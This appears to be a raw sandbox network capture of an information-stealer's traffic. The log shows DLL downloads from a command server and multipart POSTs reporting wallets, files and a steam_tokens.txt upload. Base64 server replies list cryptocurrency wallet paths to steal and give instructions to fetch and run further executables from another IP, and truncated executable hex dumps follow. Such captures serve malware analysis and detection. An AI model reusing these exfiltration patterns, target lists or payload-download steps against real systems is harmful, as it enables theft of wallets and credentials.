Jul 26, 2024 17:56:14.446520090 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Jul 26, 2024 17:56:14.782624960 CEST	87	OUT	GET /8405906461a5200c/nss3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 17:56:14.978411913 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:14 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Jul 26, 2024 17:56:16.528825998 CEST	91	OUT	GET /8405906461a5200c/softokn3.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 17:56:16.713460922 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:16 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Jul 26, 2024 17:56:16.922194004 CEST	95	OUT	GET /8405906461a5200c/vcruntime140.dll HTTP/1.1 Host: 85.28.47.31 Cache-Control: no-cache
Jul 26, 2024 17:56:17.107772112 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:17 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Jul 26, 2024 17:56:17.596580029 CEST	199	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA Host: 85.28.47.31 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Jul 26, 2024 17:56:18.341721058 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:56:18.387275934 CEST	465	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD Host: 85.28.47.31 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 2d 2d 0d 0a Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="message"wallets------BGCAAFHIEBKJKEBFIEHD--
Jul 26, 2024 17:56:18.599847078 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:18 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Jul 26, 2024 17:56:18.603230953 CEST	470	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA Host: 85.28.47.31 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------KFHCAEGCBFHJDGCBFHDAContent-Disposition: form-data; name="message"ybncbhylepme------KFHCAEGCBFHJDGCBFHDA--
Jul 26, 2024 17:56:18.791321039 CEST	359	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:18 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 132 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 33 4e 76 61 32 45 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4d 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 67 31 4c 6a 49 78 4e 53 34 78 4d 54 4d 75 4d 54 59 76 62 57 6c 75 5a 53 39 6c 62 6e 52 6c 63 69 35 6c 65 47 56 38 4d 48 77 77 66 46 4e 30 59 58 4a 30 66 44 4a 38 Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L3Nva2EvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8MnxodHRwOi8vMTg1LjIxNS4xMTMuMTYvbWluZS9lbnRlci5leGV8MHwwfFN0YXJ0fDJ8
Jul 26, 2024 17:56:23.502686977 CEST	561	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="file"------GIECFIEGDBKJKFIDHIEC--
Jul 26, 2024 17:56:24.164308071 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:56:24.205358982 CEST	463	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJD Host: 85.28.47.31 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="message"files------AKKECAFBFHJDGDHIEHJD--
Jul 26, 2024 17:56:24.442107916 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=80 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 26, 2024 17:56:24.450886011 CEST	470	OUT	POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ Host: 85.28.47.31 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FHDAFIIDAKJDGDHIDAKJ--
Jul 26, 2024 17:56:25.042160034 CEST	202	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 15:56:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	185.215.113.16	80	616	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:56:18.810400963 CEST	80	OUT	GET /soka/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Jul 26, 2024 17:56:19.618563890 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:56:19 GMT Content-Type: application/octet-stream Content-Length: 1939456 Last-Modified: Fri, 26 Jul 2024 15:02:33 GMT Connection: keep-alive ETag: "66a3ba89-1d9800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 f0 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL@fL@ M6x@WkLL @.rsrc@.idata @ +@etmksbbt`2~@iosnleehLr@.taggant0L"v@
Jul 26, 2024 17:56:19.618576050 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 17:56:19.618587971 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 17:56:19.618597984 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 26, 2024 17:56:19.618608952 CEST	1236	IN	Data Raw: 38 b5 e3 b6 dd 3e a9 d6 3a ed 0c 54 5f 4d 2d d0 0f 0c ae 63 de c8 18 4b 4e 07 ad cb c1 90 3c 53 46 3d 8f 16 8d e1 8e 03 df 61 91 d0 4c f5 9c 01 5e 08 19 c8 4d 2d 8f 97 3b e9 63 d6 5d 49 ad 56 0b db bd b7 30 76 8c cb fd 49 88 76 86 dd 8f ab 33 e9 Data Ascii: 8>:T_M-cKN<SF=aL^M-;c]IV0vIv38+1`K8,-96_Q.Ic ).lC(M,5st=Al<)HA@IaKT= FEMI.`A83.\
Jul 26, 2024 17:56:19.618619919 CEST	1236	IN	Data Raw: 42 8f 93 d0 6d 82 2f 24 7d ef d4 6f b0 71 6b bb 46 08 c9 b3 c1 68 fa ce 3c 08 aa 43 c6 8d 2c e5 59 c4 c7 30 70 ca 88 57 6d fd b0 1b 11 a4 3d b0 a8 34 b9 f7 21 ab 94 d0 59 1f d6 54 45 e7 07 6c b1 5f 2e d8 71 b2 58 f9 4c 8f b2 95 a6 eb b4 a6 21 f5 Data Ascii: Bm/$}oqkFh<C,Y0pWm=4!YTEl_.qXL!T^!7"gJ;b[{(h@9ugy@7YBj$.3M+vD67}IrML{zYvkVJ:Yv/f{su
